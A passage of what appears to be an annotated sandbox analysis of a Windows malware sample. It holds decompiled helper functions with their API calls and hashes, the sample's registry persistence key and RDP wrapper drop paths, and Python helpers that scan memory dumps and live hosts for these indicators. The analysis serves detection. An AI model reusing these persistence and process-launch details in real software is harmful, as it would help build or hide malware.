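def candidate_paths(env=None):
    """Expand the same variables ExpandEnvironmentStringsW would and join them with
    the fragments. The join order (root + \\Microsoft DN1 + file, and System32 for
    the two DLLs) is an assumption of this example."""
    env = os.environ if env is None else env
    paths = []
    for root in filter(None, (env.get("ProgramFiles"), env.get("ProgramW6432"))):
        paths += [root.rstrip("\\") + r"\Microsoft DN1" + "\\" + f for f in DROP_FILES]
    windir = env.get("windir")
    if windir:
        paths += [windir.rstrip("\\") + r"\System32" + "\\" + f for f in DROP_FILES[1:]]
    return paths


def check_host():
    """Live Windows check: existing candidate files plus every value under the HKCU
    key. Returns None on other platforms so the module still imports there."""
    if sys.platform != "win32":
        return None
    import winreg
    found = [p for p in candidate_paths() if os.path.exists(p)]
    values = []
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, PERSISTENCE_KEY) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:          # ERROR_NO_MORE_ITEMS
                    break
                values.append((name, data))
                index += 1
    except OSError:                      # key absent: nothing persisted here
        pass
    return {"files": found, "registry_values": values}


# Constructed sample dump: wide, NUL-terminated strings as the unpacked image
# would hold them. Not taken from the report.
SAMPLE_DUMP = (
    b"\x00" * 16
    + "%ProgramFiles%".encode("utf-16-le") + b"\x00\x00"
    + r"\Microsoft DN1".encode("utf-16-le") + b"\x00\x00"
    + r"\rdpwrap.ini".encode("utf-16-le") + b"\x00\x00"
    + PERSISTENCE_KEY.encode("utf-16-le") + b"\x00" * 16
)

if __name__ == "__main__":
    hits = scan_dump(SAMPLE_DUMP)
    for name, where in sorted(hits.items()):
        print(f"{name}: {where}")
    print("RDP wrapper indicators present:", rdp_wrapper_verdict(hits))
    print("host check:", check_host())
```

Run scan_dump over the 0000000D.00000002 memory dump named in the Memory Dump Source lines to confirm which encoding the strings take in this sample; check_host is for a live host and reports the values under the HKCU key without naming any particular value, since the report does not show which value the sample writes.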

                                  C-Code - Quality: 100%
                                  			E00405B4E(char __ecx, void* __edx, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v24;
                                  				intOrPtr _v48;
                                  				intOrPtr _v52;
                                  				intOrPtr _v56;
                                  				char _v76;
                                  				char _v100;
                                  				char _v108;
                                  				char _v148;
                                  				void* _t89;
                                  				void* _t100;
                                  				void* _t104;
                                  				void* _t108;
                                  				void* _t112;
                                  				intOrPtr* _t134;
                                  				char _t183;
                                  				void* _t184;
                                  				void* _t185;
                                  				void* _t186;
                                  				void* _t187;
                                  				void* _t188;
                                  				void* _t189;
                                  				void* _t190;
                                  				intOrPtr _t192;
                                  				intOrPtr _t193;
                                  				intOrPtr _t194;
                                  				intOrPtr _t195;
                                  				intOrPtr* _t196;
                                  				void* _t197;
                                  
                                  				_t197 = __eflags;
                                  				_t183 = __ecx;
                                  				_v8 = __ecx;
                                  				Sleep(0x1f4); // executed
                                  				E0041196E( &_v100, _t197);
                                  				E00411865( &_v100, E00413323( &_v100)); // executed
                                  				_t89 = E004034D1( &_v12, ".bss"); // executed
                                  				E004117D8( &_v100,  &_v148, _t89); // executed
                                  				E00405FEB(_v12);
                                  				E0040315E( &_v16,  &_v108);
                                  				E00402FCE(_t183 + 0x4c,  &_v16);
                                  				E00403148( &_v16);
                                  				E00405AAE(_t183,  &_v24);
                                  				_t134 = _v24;
                                  				_t192 =  *_t134;
                                  				_t100 = E00413441(_t134 + 4, _t192); // executed
                                  				E00403549(_t183 + 0x10, _t100); // executed
                                  				E00405FEB(_v12);
                                  				_t19 =  &_v8; // 0x41562e
                                  				_t20 = _t192 + 4; // 0x74a313ff
                                  				_t184 = _t20;
                                  				 *((intOrPtr*)( *_t19 + 0x14)) =  *((intOrPtr*)(_t134 + _t184));
                                  				_t193 =  *((intOrPtr*)(_t134 + _t184 + 4));
                                  				_t185 = _t184 + 8;
                                  				_t104 = E00413441(_t134 + _t185, _t193);
                                  				_t27 =  &_v8; // 0x41562e
                                  				E00403549( *_t27 + 0x28, _t104);
                                  				E00405FEB(_v12);
                                  				_t30 =  &_v8; // 0x41562e
                                  				_t186 = _t185 + _t193;
                                  				 *((intOrPtr*)( *_t30 + 0x18)) =  *((char*)(_t134 + _t186));
                                  				_t194 =  *((intOrPtr*)(_t134 + _t186 + 1));
                                  				_t187 = _t186 + 5;
                                  				_t108 = E00413441(_t134 + _t187, _t194); // executed
                                  				_t37 =  &_v8; // 0x41562e
                                  				E00403549( *_t37 + 0x1c, _t108); // executed
                                  				E00405FEB(_v12);
                                  				_t40 =  &_v8; // 0x41562e
                                  				_t188 = _t187 + _t194;
                                  				 *((intOrPtr*)( *_t40 + 0x20)) =  *((char*)(_t134 + _t188));
                                  				_t195 =  *((intOrPtr*)(_t134 + _t188 + 1));
                                  				_t189 = _t188 + 5;
                                  				_t112 = E00413441(_t134 + _t189, _t195); // executed
                                  				_t47 =  &_v8; // 0x41562e
                                  				E00403549( *_t47 + 0x24, _t112); // executed
                                  				E00405FEB(_v12);
                                  				_t190 = _t189 + _t195;
                                  				_t51 =  &_v8; // 0x41562e
                                  				_t196 =  *_t51;
                                  				 *((intOrPtr*)(_t196 + 0x2c)) =  *((intOrPtr*)(_t134 + _t190));
                                  				 *((intOrPtr*)(_t196 + 0x34)) =  *((char*)(_t134 + _t190 + 4));
                                  				 *((intOrPtr*)(_t196 + 0x38)) =  *((char*)(_t134 + _t190 + 5));
                                  				 *((intOrPtr*)(_t196 + 0x3c)) =  *((char*)(_t134 + _t190 + 6));
                                  				 *((intOrPtr*)(_t196 + 0x40)) =  *((char*)(_t134 + _t190 + 7));
                                  				 *((intOrPtr*)(_t196 + 0x44)) =  *((char*)(_t134 + _t190 + 8));
                                  				 *((intOrPtr*)(_t196 + 0x48)) =  *((char*)(_t134 + _t190 + 9));
                                  				E00413441(_t134 + 4 + _t190 + 0xa,  *((intOrPtr*)(_t134 + _t190 + 0xa))); // executed
                                  				_t74 =  &_v8; // 0x41562e
                                  				E00403549(_t196 + 0x30, _t74);
                                  				_t76 =  &_v8; // 0x41562e
                                  				 *_t196 = 1;
                                  				 *((intOrPtr*)(_t196 + 4)) = 1;
                                  				E00405FEB( *_t76);
                                  				E00403148( &_v24);
                                  				E00403148( &_v108);
                                  				_t173 = _v56;
                                  				if(_v56 != 0) {
                                  					E00401EB2(_t173, _t173);
                                  				}
                                  				_v56 = 0;
                                  				_v48 = 0;
                                  				_v52 = 0;
                                  				E00403148( &_v76);
                                  				return E0041140C( &_v100, 0);
                                  			}

                                  Instruction addresses: 0x00405b4e to 0x00405d36

                                  APIs
                                  • Sleep.KERNEL32(000001F4,00000000,74A313FB,00000000), ref: 00405B64
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$FreeSleepVirtual
                                  • String ID: .VA$.bss
                                  • API String ID: 277671435-4282314365
                                  • Opcode ID: ae73d4eeeba3edb545db3ca4ca3ae1908409e79bf949f37c4c4939552442591e
                                  • Instruction ID: d77f0bc86c0f0e09d154f713c611f4ee480ed774d1177d5a26b30425dba20ef3
                                  • Opcode Fuzzy Hash: ae73d4eeeba3edb545db3ca4ca3ae1908409e79bf949f37c4c4939552442591e
                                  • Instruction Fuzzy Hash: 8C516671900519AFCB15EFA1C8D18EEBBB9EF44308B1041BEE406AB296DF34AB45CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                   			// UTF-8 -> UTF-16 string conversion helper. The first MultiByteToWideChar
                                   			// call (cchWideChar = 0) only sizes the target; the buffer is then taken
                                   			// from E00405F68 (VirtualAlloc), filled with CP_UTF8 (0xFDE9), copied into
                                   			// the string object *_a4 via E004036F7/E00403549 (lstrlenW/lstrcpyW) and
                                   			// both temporaries are released with E00405FEB (VirtualFree). E0040319E is
                                   			// lstrlenA. _t14 and _t26 are decompiler temporaries left undeclared in
                                   			// this listing.
                                   			E004031AF(char** __ecx, void* __eflags, intOrPtr* _a4) {
                                  				char** _v8;
                                  				short* _t15;
                                  				void* _t19;
                                  				int _t39;
                                  
                                  				_push(__ecx);
                                  				_v8 = __ecx;
                                  				 *_a4 = 0;
                                  				if(E0040319E(__ecx) > 0) {
                                  					_t39 = MultiByteToWideChar(0, 2,  *__ecx, E0040319E(__ecx) + 2, 0, 0) + _t14;
                                  					_t15 = E00405F68(_t39);
                                  					_t26 = _t15;
                                  					E0040319E(_v8);
                                   					MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _t15, _t39); // 0xFDE9 == CP_UTF8, -1 == null-terminated source
                                  					_t19 = E004036F7( &_v8, _t15); // executed
                                  					E00403549(_a4, _t19); // executed
                                  					E00405FEB(_v8);
                                  					E00405FEB(_t26);
                                  				}
                                  				return _a4;
                                   			}

                                   Instruction addresses: 0x004031b2, 0x004031bc, 0x004031bf, 0x004031c8, 0x004031e4, 0x004031e8, 0x004031f0, 0x004031f2, 0x00403207, 0x00403211, 0x0040321a, 0x00403222, 0x00403229, 0x00403229, 0x00403234

                                  APIs
                                    • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,74A313FB,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,74A313FB,?,00403620,00000000,?,?), ref: 004031A5
                                  • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,74A313FB,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,74A313FB), ref: 004031DC
                                    • Part of subcall function 00405F68: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,00403620,00000000,?,?,74A313FB,00000000), ref: 00403207
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$ByteCharMultiVirtualWidelstrcpy$AllocFree
                                  • String ID: 6@
                                  • API String ID: 4006399363-952913687
                                  • Opcode ID: 2b79037b742289ec2611566c79040ddf19f25a4ef00d7f821399da99d6758848
                                  • Instruction ID: d9978922c9701d3022712c3417eb10aadbb871c603d42485b42bce1279e5fb8f
                                  • Opcode Fuzzy Hash: 2b79037b742289ec2611566c79040ddf19f25a4ef00d7f821399da99d6758848
                                  • Instruction Fuzzy Hash: EB019231600114BBCB14EFA6CC86D9E3AADDF09759B00007AF502AB3D1CA788E0087A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                   			// Thin CreateProcessW wrapper: E00401052 zero-fills the 0x44-byte
                                   			// STARTUPINFOW (memset-style), cb is set to sizeof(STARTUPINFOW) == 0x44,
                                   			// and the process is started from *_a4 / *_a8 with no creation flags,
                                   			// no inherited handles and the caller's environment. Only hProcess is
                                   			// kept (in *__ecx); the returned hThread is neither stored nor closed here.
                                   			E004120F8(void** __ecx, void* __eflags, WCHAR** _a4, WCHAR** _a8) {
                                  				struct _PROCESS_INFORMATION _v20;
                                  				struct _STARTUPINFOW _v88;
                                  				int _t12;
                                  				void** _t22;
                                  
                                  				_t22 = __ecx;
                                  				E00401052( &_v88, 0, 0x44);
                                  				_v88.cb = 0x44;
                                  				_t12 = CreateProcessW( *_a4,  *_a8, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
                                  				if(_t12 == 0) {
                                  					return 0;
                                  				}
                                  				 *_t22 = _v20.hProcess;
                                  				return 1;
                                   			}

                                   Instruction addresses: 0x00412109, 0x0041210b, 0x00412119, 0x00412133, 0x0041213b, 0x00000000, 0x00412147, 0x00412140, 0x00000000

                                  APIs
                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00412133
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID: D
                                  • API String ID: 963392458-2746444292
                                  • Opcode ID: 806a1345995c658448e08c7749a84233f626c00a79c6c3af5016fe5ec34afd3a
                                  • Instruction ID: 7316dee4d5838358630adf92f0372be6f077b375a233667746e950a813593388
                                  • Opcode Fuzzy Hash: 806a1345995c658448e08c7749a84233f626c00a79c6c3af5016fe5ec34afd3a
                                  • Instruction Fuzzy Hash: 87F030B6600249AFDB00DFE4DD81DEB77BDEB44348B008439E64ADB250E6B49D18C765
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                   			// Returns the running image's own path as a string object: a 0x7D0-byte
                                   			// buffer (0x3E8 WCHARs) is taken from the process heap via E00401085,
                                   			// filled by GetModuleFileNameW(NULL, ...), copied into *_t16 through
                                   			// E004036F7/E00403549 and released with E00401099 (HeapFree). _t15, _t19
                                   			// and _t21 are decompiler temporaries left undeclared in this listing.
                                   			E004109A0() {
                                  				char _v8;
                                  				void* __ecx;
                                  				WCHAR* _t3;
                                  				void* _t5;
                                  				signed int* _t10;
                                  				long _t15;
                                  				signed int* _t16;
                                  				intOrPtr* _t21;
                                  
                                  				_push(_t10);
                                  				_t16 = _t10;
                                  				_t3 = E00401085(0x7d0);
                                  				 *_t16 =  *_t16 & 0x00000000;
                                  				_t19 = _t3;
                                  				 *_t21 = 0x3e8;
                                  				GetModuleFileNameW(0, _t3, _t15);
                                  				_t5 = E004036F7( &_v8, _t19); // executed
                                  				E00403549(_t16, _t5); // executed
                                  				E00405FEB(_v8);
                                  				E00401099(_t19);
                                  				return _t16;
                                   			}

                                   Instruction addresses: 0x004109a3, 0x004109ab, 0x004109ad, 0x004109b2, 0x004109b5, 0x004109b7, 0x004109c1, 0x004109cb, 0x004109d3, 0x004109db, 0x004109e1, 0x004109ec

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$FreeProcesslstrcpylstrlen$AllocateFileModuleNameVirtual
                                  • String ID: ?VA
                                  • API String ID: 258861418-1028452459
                                  • Opcode ID: 5e9790b0f14f75e7de37d6df4a049945b021b0a9b244203bc4b82d125c1b0ceb
                                  • Instruction ID: a8e575aaac2c0b60fdd0bfa417f7cf0f615c7bb468fc2b6995dd3cebff2648c5
                                  • Opcode Fuzzy Hash: 5e9790b0f14f75e7de37d6df4a049945b021b0a9b244203bc4b82d125c1b0ceb
                                  • Instruction Fuzzy Hash: 5AE06D626042107BD214B767EC17FAF3AADCF8136AF00003EF545A62D1DEB85A0086A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%
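The per-function "APIs" lists in this report (the `• Name.MODULE(args), ref: ADDR` entries, with "Part of subcall function" marking calls that happen inside a helper) are the fastest way to profile a dumped function, but they are only text. The parser below is an added example, not part of the Joe Sandbox report or of the sample: it turns those entries into records, separates direct calls from helper calls, and pulls out the literal strings the sandbox saw on the stack (registry paths, section names). The sample block is copied from the E004109A0 entries above plus one argument-less entry (lstrcatW from E00403447); the record layout and the line regex are this example's own assumptions about the format, not a documented Joe Sandbox schema.

```python
import re
from dataclasses import dataclass
from typing import Optional

# One "APIs" entry of the report. Lines look like (bullet, optional
# "Part of subcall function <addr>:" prefix, API.MODULE, optional argument
# list, ", ref: <addr>"):
#   • CreateProcessW.KERNEL32(?,?,00000000,...), ref: 00412133
#   • Part of subcall function 00405F68: VirtualAlloc.KERNEL32(...), ref: 00405F76
#   • lstrcatW.KERNEL32 ref: 00403477
# Assumed format, derived from the entries on this page.
API_LINE = re.compile(
    r"^\s*[•*-]\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_ARG = re.compile(r"^-?[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                       # address of the call instruction
    args: list                     # stack arguments as listed (may be empty)
    subcall: Optional[int] = None  # callee address when the call happens inside a helper

    @property
    def direct(self) -> bool:
        return self.subcall is None


def parse_api_block(text: str) -> list:
    """Parse every API entry in a block of report text; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(api=m["api"], module=m["module"], ref=int(m["ref"], 16),
                             args=args, subcall=int(m["sub"], 16) if m["sub"] else None))
    return calls


def classify_arg(arg: str) -> str:
    """'hex' for 8-digit (optionally negative) values, 'unknown' for '?', else 'string'."""
    if arg == "?":
        return "unknown"
    return "hex" if HEX_ARG.match(arg) else "string"


def api_profile(calls, direct_only: bool = False) -> set:
    """Set of 'API.MODULE' names, optionally ignoring calls made inside helpers."""
    return {f"{c.api}.{c.module}" for c in calls if c.direct or not direct_only}


def string_args(calls) -> set:
    """Every literal string the sandbox saw on the stack (registry paths, section names, ...)."""
    return {a for c in calls for a in c.args if classify_arg(a) == "string"}


# Constructed sample: the E004109A0 entries from this report plus one
# argument-less entry (lstrcatW from E00403447).
SAMPLE = r"""
  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
• GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
  • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
• lstrcatW.KERNEL32 ref: 00403477
"""

if __name__ == "__main__":
    calls = parse_api_block(SAMPLE)
    for c in calls:
        kind = "direct      " if c.direct else f"via {c.subcall:08X}"
        print(f"{c.ref:08X} {kind} {c.api}.{c.module} args={len(c.args)}")
    print("direct profile:", sorted(api_profile(calls, direct_only=True)))
    print("strings:", sorted(string_args(calls)))
```

Running the parser over a whole report (every "APIs" block concatenated) gives a per-dump API set that can be diffed against other samples of the same family; the `direct_only` switch matters because helper calls such as VirtualFree from E00405FEB are repeated under every caller and would otherwise dominate the profile.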

                                  C-Code - Quality: 100%
                                   			// Wide-string append: grows the target buffer with E00405F8C (takes the
                                   			// old pointer and a new byte size, i.e. realloc-style) to hold both
                                   			// strings plus a terminator (E00403373 == lstrlenW; *2 for WCHAR, +4 for
                                   			// the terminator) and then lstrcatW's *_a4 onto it.
                                   			E00403447(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
                                  				void* _t4;
                                  				WCHAR* _t6;
                                  				WCHAR** _t8;
                                  				WCHAR** _t14;
                                  
                                  				_t14 = _a4;
                                  				_t8 = __ecx;
                                  				_t4 = E00403373(_t14);
                                  				_t6 = E00405F8C( *((intOrPtr*)(__ecx)), 4 + (_t4 + E00403373(__ecx)) * 2); // executed
                                  				 *_t8 = _t6;
                                  				return lstrcatW(_t6,  *_t14);
                                   			}

                                   Instruction addresses: 0x0040344d, 0x00403450, 0x00403454, 0x0040346d, 0x00403472, 0x00403481

                                  APIs
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • lstrcatW.KERNEL32 ref: 00403477
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrlen
                                  • String ID: ?VA
                                  • API String ID: 1475610065-1028452459
                                  • Opcode ID: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                  • Instruction ID: 49b9b30c5e13f085cb611e028f6c6d6892849633b3b038c637a710d95911752b
                                  • Opcode Fuzzy Hash: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                  • Instruction Fuzzy Hash: 02E0D8327042105BCB106B66D8C496E7B5DEF853A0704043AF90597250DE785C0096E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                   			// UTF-16 -> UTF-8 conversion, the mirror of E004031AF: the first
                                   			// WideCharToMultiByte call (cbMultiByte = 0) only sizes the target, the
                                   			// buffer comes from E00405FFA (VirtualAlloc), the real conversion uses
                                   			// CP_UTF8 (0xFDE9), the result is copied/appended into the ANSI string
                                   			// object _a4 via E004034D1/E00403237 (lstrcpyA/lstrcatA) and both
                                   			// temporaries are released with E00405FEB (VirtualFree). _t22 is a
                                   			// decompiler temporary left undeclared in this listing.
                                   			E00403666(short** __ecx, intOrPtr _a4) {
                                  				short** _v8;
                                  				char* _t12;
                                  				void* _t15;
                                  				int _t35;
                                  				short** _t36;
                                  
                                  				_push(__ecx);
                                  				_v8 = __ecx;
                                  				E004032D5(_a4);
                                  				if( *__ecx != 0) {
                                  					_t35 = WideCharToMultiByte(0, 0x200,  *__ecx, E00403373(__ecx), 0, 0, 0, 0);
                                  					_t12 = E00405FFA(_t35);
                                  					_t36 = _v8;
                                  					_t22 = _t12;
                                   					WideCharToMultiByte(0xfde9, 0,  *_t36, E00403373(_t36), _t12, _t35, 0, 0); // 0xFDE9 == CP_UTF8
                                  					_t15 = E004034D1( &_v8, _t22); // executed
                                  					E00403237(_a4, _t15); // executed
                                  					E00405FEB(_v8);
                                  					E00405FEB(_t22);
                                  				}
                                  				return _a4;
                                   			}

                                   Instruction addresses: 0x00403669, 0x00403671, 0x00403674, 0x0040367d, 0x00403699, 0x0040369d, 0x004036a7, 0x004036aa, 0x004036be, 0x004036c8, 0x004036d1, 0x004036d9, 0x004036e0, 0x004036e0, 0x004036eb

                                  APIs
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                    • Part of subcall function 00405FFA: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 00406004
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
                                  • String ID:
                                  • API String ID: 346377423-0
                                  • Opcode ID: 33dd4bd5d87851eb0de9a761e9b01817b2e54de34538e841d73ad23b70dc114d
                                  • Instruction ID: c7d19490b4b7bf55ff7d061cd44103b5bbdd205034f2344246e6d9ab79f340c2
                                  • Opcode Fuzzy Hash: 33dd4bd5d87851eb0de9a761e9b01817b2e54de34538e841d73ad23b70dc114d
                                  • Instruction Fuzzy Hash: 5C014071301624BBDB15AFA5CC86EEE7A6D9F09755F10007AB906BB2C1CE785E0097A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                   			// Timing jitter / weak PRNG: sleeps 1 ms, then derives a value below
                                   			// 10000 (0x2710) from GetTickCount() scaled by the caller's seed
                                   			// (0x359 == 857). Not cryptographic; the output is predictable from
                                   			// system uptime.
                                   			E0041338D(signed int _a4) {
                                  
                                  				Sleep(1); // executed
                                  				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
                                   			}

                                   Instruction addresses: 0x00413392, 0x004133b5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CountSleepTick
                                  • String ID:
                                  • API String ID: 2804873075-0
                                  • Opcode ID: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                  • Instruction ID: cb4e42e87864ed722aedde75ee5ec1912828b431a3830261680a48f961af466f
                                  • Opcode Fuzzy Hash: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                  • Instruction Fuzzy Hash: EDD0123035C104AFE30C9B59FC5E7A57A6ED7D5705F04C03BF60EC92E1C9B195554598
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                   			// Releases the mutex whose handle is stored in the object (*__ecx) and
                                   			// closes that handle; returns CloseHandle's result.
                                   			E004117A2(void** __ecx) {
                                  				int _t2;
                                  				void** _t4;
                                  
                                  				_t4 = __ecx;
                                  				ReleaseMutex( *__ecx);
                                  				_t2 = CloseHandle( *_t4); // executed
                                  				return _t2;
                                   			}

                                   Instruction addresses: 0x004117a3, 0x004117a7, 0x004117af, 0x004117b6

                                  APIs
                                  • ReleaseMutex.KERNEL32(?,?,0041141C,.VA,00405D32,.VA,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 004117A7
                                  • CloseHandle.KERNEL32(?), ref: 004117AF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleMutexRelease
                                  • String ID:
                                  • API String ID: 4207627910-0
                                  • Opcode ID: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                  • Instruction ID: da85866315e866d9b3d8c4bbf16f7db246e1d0e2a6d46926b2ed1ada722145db
